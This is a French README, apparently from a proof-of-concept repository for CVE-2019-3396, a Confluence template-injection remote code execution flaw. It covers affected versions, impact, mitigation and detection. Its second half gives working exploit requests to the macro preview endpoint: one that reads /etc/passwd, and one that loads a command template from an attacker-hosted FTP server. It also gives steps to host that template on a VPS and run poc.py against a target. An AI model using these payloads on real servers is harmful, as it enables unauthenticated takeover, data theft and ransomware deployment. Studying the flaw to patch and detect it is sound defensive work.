CVE-2019-3396
CVE-2019-3396 confluence SSTI RCE
🔎 Qu'est-ce que CVE-2019-3396 ?
- Un bug critique de Confluence (Atlassian).
- Type : Injection de modèle + Traversée de chemin.
- Risque : Exécution de code à distance (RCE) sans authentification.
- Statut : Exploité activement.
🛑 Versions concernées
- 6.6.0 → 6.6.11 ❌ vulnérable
- 6.6.12 ✅ corrigé
- 6.12.0 → 6.12.2 ❌ vulnérable
- 6.12.3 ✅ corrigé
- 6.13.0 → 6.13.2 ❌ vulnérable
- 6.13.3 ✅ corrigé
- 6.14.0 → 6.14.1 ❌ vulnérable
- 6.14.2 ✅ corrigé
👉 Consultez toujours l'avis officiel d'Atlassian pour tous les détails.
💥 Impact
- Prise de contrôle complète du serveur
- Vol de données, rançongiciels, crypto-mineurs
- Les attaquants peuvent exécuter n'importe quel code
🔐 Atténuation
- ✅ Mettez à jour vers une version corrigée de Confluence (meilleure solution)
- 🚫 Désactivez la macro Widget Connector si vous ne pouvez pas patcher immédiatement
- 🔒 Limitez l'accès (interne uniquement jusqu'à correction)
👀 Détection (conseils sûrs)
- Surveillez les logs pour des requêtes étranges vers les points de terminaison macro/preview
- Recherchez des processus inhabituels ou du trafic sortant
- Utilisez des scanners de vulnérabilités pour confirmer la version
📂 Lire un fichier
POST /rest/tinymce/1/macro/preview HTTP/2
Host: {***}
{"macro":{"params":{"_template":"file:///etc/passwd"}}}
Exécuter une commande
POST /rest/tinymce/1/macro/preview HTTP/2
Host: ***
{"contentId":"1","macro":{"name":"widget","params":{"_template":"ftp://***:8888/cmd.vm","command":"id"},"body":""}}
Automatisation
- Téléversez cmd.vm sur votre VPS
- Utilisez ftp ou https pour créer un lien vers ce fichier cmd.vm via
pip install pyftpdlib
python -m pyftpdlib -p 8888
- Mettez à jour le fichier poc.py avec la nouvelle valeur pour pyftp = "ftp://10.100.10.100:8888/cmd.vm"
python poc.py <url> <cmd>
python poc.py https://ip:port "id"
⚠️ ASTUCE — ce dépôt est uniquement destiné à l'éducation, la défense et la sensibilisation.
🔗 Références